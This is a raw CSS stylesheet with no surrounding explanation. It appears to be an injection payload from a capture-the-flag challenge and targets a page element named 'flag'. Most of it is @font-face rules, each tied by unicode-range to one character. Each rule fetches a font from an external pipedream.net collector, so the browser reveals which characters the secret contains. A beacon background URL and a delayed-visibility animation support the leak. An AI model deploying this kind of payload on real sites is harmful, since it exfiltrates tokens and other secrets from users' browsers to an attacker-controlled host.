body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W27')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w27,p98w27,p106w27,p112w27,p115w27,p121w27,p122w27,p48w27,p49w27,p52w27,p53w27,p55w27,p125w27,monospace;width:27ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w27;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W27');unicode-range:U+0061}
@font-face{font-family:p98w27;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W27');unicode-range:U+0062}
@font-face{font-family:p106w27;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W27');unicode-range:U+006A}
@font-face{font-family:p112w27;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W27');unicode-range:U+0070}
@font-face{font-family:p115w27;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W27');unicode-range:U+0073}
@font-face{font-family:p121w27;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W27');unicode-range:U+0079}
@font-face{font-family:p122w27;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W27');unicode-range:U+007A}
@font-face{font-family:p48w27;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W27');unicode-range:U+0030}
@font-face{font-family:p49w27;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W27');unicode-range:U+0031}
@font-face{font-family:p52w27;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W27');unicode-range:U+0034}
@font-face{font-family:p53w27;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W27');unicode-range:U+0035}
@font-face{font-family:p55w27;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W27');unicode-range:U+0037}
@font-face{font-family:p125w27;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W27');unicode-range:U+007D}